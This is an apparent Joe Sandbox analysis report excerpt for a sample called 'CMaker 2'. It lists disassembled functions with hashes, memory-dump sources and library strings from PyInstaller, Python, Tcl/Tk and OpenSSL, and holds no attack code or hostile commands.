                                                                                                                                                                                  • Opcode ID: 026a14245fef453ce3d65f29d84bb8553a0a4b30dbea44e5e557f8660a976952
                                                                                                                                                                                  • Instruction ID: 5871834bbc3bf9ae54882d00e1f90cbd06d180f5d7cc492ca94e7ed66a0f6efb
                                                                                                                                                                                  • Opcode Fuzzy Hash: 026a14245fef453ce3d65f29d84bb8553a0a4b30dbea44e5e557f8660a976952
                                                                                                                                                                                  • Instruction Fuzzy Hash: 8761C671F1DA1286FE79BBF1997413963A0AF55BA2F09443CCD4E0EB90DE3DA9459300
                                                                                                                                                                                  Function 00007FFD9F3BA434 Relevance: 7.6, APIs: 5, Instructions: 138encryptionCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.2266983474.00007FFD9F3B1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFD9F3B0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000005.00000002.2266842106.00007FFD9F3B0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2266983474.00007FFD9F3D0000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2266983474.00007FFD9F3D9000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2266983474.00007FFD9F3DD000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2267323992.00007FFD9F3E0000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2267409295.00007FFD9F3E2000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ffd9f3b0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Cert$Store$00007CloseContextEnumErrorFreeLastOpen
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 966150261-0
                                                                                                                                                                                  • Opcode ID: a8fa065c201c2264288c3b6bd62196d31cd228452313055002669bf3ef1d3f0f
                                                                                                                                                                                  • Instruction ID: e52cba0e00f8f901508dad0aa0132cc095478feb25e9c347ad16fbe946a26aff
                                                                                                                                                                                  • Opcode Fuzzy Hash: a8fa065c201c2264288c3b6bd62196d31cd228452313055002669bf3ef1d3f0f
                                                                                                                                                                                  • Instruction Fuzzy Hash: 4551F871F1DE1285FE79AFB1A97813963A0AF45BA2F184439CD8E0EB94DE3CE5458300
                                                                                                                                                                                  Function 00007FFD935A1EE7 Relevance: 7.5, APIs: 1, Strings: 3, Instructions: 461COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.2264373753.00007FFD935A1000.00000040.00000001.01000000.00000012.sdmp, Offset: 00007FFD935A0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000005.00000002.2264326565.00007FFD935A0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264373753.00007FFD93623000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264373753.00007FFD93625000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264373753.00007FFD9364D000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264373753.00007FFD93658000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264373753.00007FFD93663000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264633569.00007FFD93667000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264772265.00007FFD93668000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ffd935a0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: 00007B22408
                                                                                                                                                                                  • String ID: ..\s\ssl\statem\extensions_srvr.c$D:\a\1\s\include\internal/packet.h$tls_parse_ctos_psk
                                                                                                                                                                                  • API String ID: 4199793457-3130753023
                                                                                                                                                                                  • Opcode ID: bb724076062f272585b580d73b7977494b0d4d745f159f4f9cf574436709696b
                                                                                                                                                                                  • Instruction ID: 9f87124280d5a4db6dc254ac8d95130d526e11ffda779d5bc794ffaa083b0860
                                                                                                                                                                                  • Opcode Fuzzy Hash: bb724076062f272585b580d73b7977494b0d4d745f159f4f9cf574436709696b
                                                                                                                                                                                  • Instruction Fuzzy Hash: 8612D26AB0868241F7B19BE1D4643BD67A8EF88B84F444032ED5D67B99DF7CE541C700
                                                                                                                                                                                  Function 00007FF6FAC05D7C Relevance: 6.1, APIs: 4, Instructions: 143timeCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • _get_daylight.LIBCMT ref: 00007FF6FAC05DAA
                                                                                                                                                                                    • Part of subcall function 00007FF6FAC054F8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6FAC0550C
                                                                                                                                                                                  • _get_daylight.LIBCMT ref: 00007FF6FAC05DBB
                                                                                                                                                                                    • Part of subcall function 00007FF6FAC05498: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6FAC054AC
                                                                                                                                                                                  • _get_daylight.LIBCMT ref: 00007FF6FAC05DCC
                                                                                                                                                                                    • Part of subcall function 00007FF6FAC054C8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6FAC054DC
                                                                                                                                                                                    • Part of subcall function 00007FF6FABFA0E4: RtlFreeHeap.NTDLL(?,?,?,00007FF6FAC02B22,?,?,?,00007FF6FAC02B5F,?,?,00000000,00007FF6FAC03025,?,?,?,00007FF6FAC02F57), ref: 00007FF6FABFA0FA
                                                                                                                                                                                    • Part of subcall function 00007FF6FABFA0E4: GetLastError.KERNEL32(?,?,?,00007FF6FAC02B22,?,?,?,00007FF6FAC02B5F,?,?,00000000,00007FF6FAC03025,?,?,?,00007FF6FAC02F57), ref: 00007FF6FABFA104
                                                                                                                                                                                  • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF6FAC0600C), ref: 00007FF6FAC05DF3
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.2261013560.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000005.00000002.2260990879.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261040109.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC23000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3458911817-0
                                                                                                                                                                                  • Opcode ID: 86688f8d2f1ae04f1aab1eeae53bd1aef32144e70f3d14e48b21619aa4792d57
                                                                                                                                                                                  • Instruction ID: b50354e1d2224f425f0befe569970a78b107d42bc8254237206967faf44b811a
                                                                                                                                                                                  • Opcode Fuzzy Hash: 86688f8d2f1ae04f1aab1eeae53bd1aef32144e70f3d14e48b21619aa4792d57
                                                                                                                                                                                  • Instruction Fuzzy Hash: 0B517FB2A1864686E720DF25D8811BA67B8BB48784F44E175EA6DC76D6FF3CE4008B40
                                                                                                                                                                                  Function 00007FFD935A24EB Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 332COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.2264373753.00007FFD935A1000.00000040.00000001.01000000.00000012.sdmp, Offset: 00007FFD935A0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000005.00000002.2264326565.00007FFD935A0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264373753.00007FFD93623000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264373753.00007FFD93625000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264373753.00007FFD9364D000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264373753.00007FFD93658000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264373753.00007FFD93663000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264633569.00007FFD93667000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264772265.00007FFD93668000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ffd935a0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: 00007B22408
                                                                                                                                                                                  • String ID: ..\s\ssl\statem\extensions_clnt.c$tls_construct_ctos_psk
                                                                                                                                                                                  • API String ID: 4199793457-446233508
                                                                                                                                                                                  • Opcode ID: b36fb01384b575ec35d89c0d8260da8a6938daa3986464ee3d691d16473f4eab
                                                                                                                                                                                  • Instruction ID: 5a37dbab0916a4069fc88a3cdeb869274c5e8907be68b247090be84b9e962a73
                                                                                                                                                                                  • Opcode Fuzzy Hash: b36fb01384b575ec35d89c0d8260da8a6938daa3986464ee3d691d16473f4eab
                                                                                                                                                                                  • Instruction Fuzzy Hash: A7E18F65B0D68282FAB1DB91D5607BE67A8EF88B84F440036ED0DA7BD6DF2CE501C700
                                                                                                                                                                                  Function 00007FFD9F3BB6BC Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 206COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • Cannot create a server socket with a PROTOCOL_TLS_CLIENT context, xrefs: 00007FFD9F3BB702
                                                                                                                                                                                  • Cannot create a client socket with a PROTOCOL_TLS_SERVER context, xrefs: 00007FFD9F3BB749
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.2266983474.00007FFD9F3B1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFD9F3B0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000005.00000002.2266842106.00007FFD9F3B0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2266983474.00007FFD9F3D0000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2266983474.00007FFD9F3D9000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2266983474.00007FFD9F3DD000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2267323992.00007FFD9F3E0000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2267409295.00007FFD9F3E2000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ffd9f3b0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: 00007D935
                                                                                                                                                                                  • String ID: Cannot create a client socket with a PROTOCOL_TLS_SERVER context$Cannot create a server socket with a PROTOCOL_TLS_CLIENT context
                                                                                                                                                                                  • API String ID: 1878651150-1683031804
                                                                                                                                                                                  • Opcode ID: c89e802ffd63f0afd4719b640548f1c852397171ec8733eca855b3a355ef6578
                                                                                                                                                                                  • Instruction ID: 1f036af4c06fde0412ce05344cffecfd978c8d093847a89ae0c53040524b4ab9
                                                                                                                                                                                  • Opcode Fuzzy Hash: c89e802ffd63f0afd4719b640548f1c852397171ec8733eca855b3a355ef6578
                                                                                                                                                                                  • Instruction Fuzzy Hash: 0C910D65B08B4282FA74AFA6E87427973A1FF89B96F144139CE4E4B761DF3CE4458700
                                                                                                                                                                                  Function 00007FF6FABE42E0 Relevance: 157.9, APIs: 44, Strings: 46, Instructions: 364libraryloaderCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00007FF6FABE4EB7,?,00007FF6FABE224E), ref: 00007FF6FABE42F0
                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00007FF6FABE4EB7,?,00007FF6FABE224E), ref: 00007FF6FABE4331
                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00007FF6FABE4EB7,?,00007FF6FABE224E), ref: 00007FF6FABE4356
                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00007FF6FABE4EB7,?,00007FF6FABE224E), ref: 00007FF6FABE437B
                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00007FF6FABE4EB7,?,00007FF6FABE224E), ref: 00007FF6FABE43A3
                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00007FF6FABE4EB7,?,00007FF6FABE224E), ref: 00007FF6FABE43CB
                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00007FF6FABE4EB7,?,00007FF6FABE224E), ref: 00007FF6FABE43F3
                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00007FF6FABE4EB7,?,00007FF6FABE224E), ref: 00007FF6FABE441B
                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00007FF6FABE4EB7,?,00007FF6FABE224E), ref: 00007FF6FABE4443
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.2261013560.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000005.00000002.2260990879.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261040109.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC23000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: AddressProc
                                                                                                                                                                                  • String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyList_Append$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
                                                                                                                                                                                  • API String ID: 190572456-2007157414
                                                                                                                                                                                  • Opcode ID: 6a244b584105566801507efa4892542c2e2cca56cf1b8684858a7b7b26d5cccb
                                                                                                                                                                                  • Instruction ID: 2baaca0cd607ce0177c95d83cca8cf8e82db03c9bafb6c725dcb4c07420af4fa
                                                                                                                                                                                  • Opcode Fuzzy Hash: 6a244b584105566801507efa4892542c2e2cca56cf1b8684858a7b7b26d5cccb
                                                                                                                                                                                  • Instruction Fuzzy Hash: F7127DE4A1DB4390FB59CB44A8901B422B1BF4A745B94A1F6CA3ED23E0FF7DB558D240
                                                                                                                                                                                  Function 00007FF6FABE60C0 Relevance: 112.3, APIs: 31, Strings: 33, Instructions: 264libraryloaderCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.2261013560.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000005.00000002.2260990879.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261040109.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC23000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: AddressProc
                                                                                                                                                                                  • String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
                                                                                                                                                                                  • API String ID: 190572456-573889970
                                                                                                                                                                                  • Opcode ID: e7ad631868096c1857f19de989c3ae72b1e7ed32f0438870ee7e79edbb589c26
                                                                                                                                                                                  • Instruction ID: 857f873d96ab79f8aab4f997b8a7b5ae86da6f12a4b5bc5144c537041845d8c6
                                                                                                                                                                                  • Opcode Fuzzy Hash: e7ad631868096c1857f19de989c3ae72b1e7ed32f0438870ee7e79edbb589c26
                                                                                                                                                                                  • Instruction Fuzzy Hash: 9AE16EE4A0DB4790FB56CB14B8A02B463B4BF19754B94A0F6C93ED23E5FF3CA5499201
                                                                                                                                                                                  Function 00007FFD9DFC38B0 Relevance: 26.5, APIs: 3, Strings: 12, Instructions: 267COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.2266399755.00007FFD9DFC1000.00000040.00000001.01000000.00000016.sdmp, Offset: 00007FFD9DFC0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000005.00000002.2266316234.00007FFD9DFC0000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2266399755.00007FFD9DFDA000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2266399755.00007FFD9DFE2000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2266691733.00007FFD9DFE3000.00000080.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2266751869.00007FFD9DFE5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ffd9dfc0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: 00007B2245630
                                                                                                                                                                                  • String ID: ABCMeta$GenericMeta$TypingMeta$_ProtocolMeta$__module__$__orig_bases__$__slots__$abc$mypyc classes can't have __slots__$mypyc classes can't have a metaclass$typing$typing_extensions
                                                                                                                                                                                  • API String ID: 1780217008-3015203947
                                                                                                                                                                                  • Opcode ID: 915c729ee343eac809401c4ef382881e9182cff1a9f5c6d4f48ea5a54d643442
                                                                                                                                                                                  • Instruction ID: 9295b3bfc05d866886a1433f7dd93d5108c0b35054168ed5f136fc92a31bbcf1
                                                                                                                                                                                  • Opcode Fuzzy Hash: 915c729ee343eac809401c4ef382881e9182cff1a9f5c6d4f48ea5a54d643442
                                                                                                                                                                                  • Instruction Fuzzy Hash: AEC12E25B08BC681EB65AFE9A96627823E0BF55B84F055335CECD07654FF3CE1A99300
                                                                                                                                                                                  Function 00007FF6FABE15A0 Relevance: 22.9, APIs: 1, Strings: 12, Instructions: 137COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.2261013560.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000005.00000002.2260990879.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261040109.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC23000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: CurrentProcess
                                                                                                                                                                                  • String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
                                                                                                                                                                                  • API String ID: 2050909247-1550345328
                                                                                                                                                                                  • Opcode ID: ad333d4e6d983366683b0160822d6d3ede48283b4990ce3aeba120fa01df1e70
                                                                                                                                                                                  • Instruction ID: ef82866acc0961129276e843e047cd4436b42a969e2b07fc4e0ad0626a6dd085
                                                                                                                                                                                  • Opcode Fuzzy Hash: ad333d4e6d983366683b0160822d6d3ede48283b4990ce3aeba120fa01df1e70
                                                                                                                                                                                  • Instruction Fuzzy Hash: DC518FA1B0864392EB109B15E4801BA23A0FF56B94FD491F1EE2EC77D6FE7CE5548300
                                                                                                                                                                                  Function 00007FF6FABE69A0 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 115COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 00007FF6FABE7800: MultiByteToWideChar.KERNEL32(?,?,?,00007FF6FABE31D4,00000000,00007FF6FABE1905), ref: 00007FF6FABE7839
                                                                                                                                                                                  • ExpandEnvironmentStringsW.KERNEL32(00000000,00007FF6FABE6EC7,?,00000000,FFFFFFFF,00007FF6FABE2AA6), ref: 00007FF6FABE69FC
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.2261013560.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000005.00000002.2260990879.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261040109.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC23000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ByteCharEnvironmentExpandMultiStringsWide
                                                                                                                                                                                  • String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
                                                                                                                                                                                  • API String ID: 2001182103-930877121
                                                                                                                                                                                  • Opcode ID: 043a92a9ee9717b47d55a3c399030426f86f17bf1d4776fc1ffd4db9ab3bbf80
                                                                                                                                                                                  • Instruction ID: 8b25c6b12ee2d5cc3aba61eaff1e1de9e96f50184a8bad144f05e36eec7f1066
                                                                                                                                                                                  • Opcode Fuzzy Hash: 043a92a9ee9717b47d55a3c399030426f86f17bf1d4776fc1ffd4db9ab3bbf80
                                                                                                                                                                                  • Instruction Fuzzy Hash: 4641BA61B1C68341FB51DB25E8A12BA6361EF95780FC4A4F5E66EC36D6FE3CE5048700
                                                                                                                                                                                  Function 00007FFD935B5CA0 Relevance: 22.9, APIs: 4, Strings: 9, Instructions: 101COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.2264373753.00007FFD935A1000.00000040.00000001.01000000.00000012.sdmp, Offset: 00007FFD935A0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000005.00000002.2264326565.00007FFD935A0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264373753.00007FFD93623000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264373753.00007FFD93625000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264373753.00007FFD9364D000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264373753.00007FFD93658000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264373753.00007FFD93663000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264633569.00007FFD93667000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264772265.00007FFD93668000.00000004.00000001.01000000.00000012.sdmpDownload File
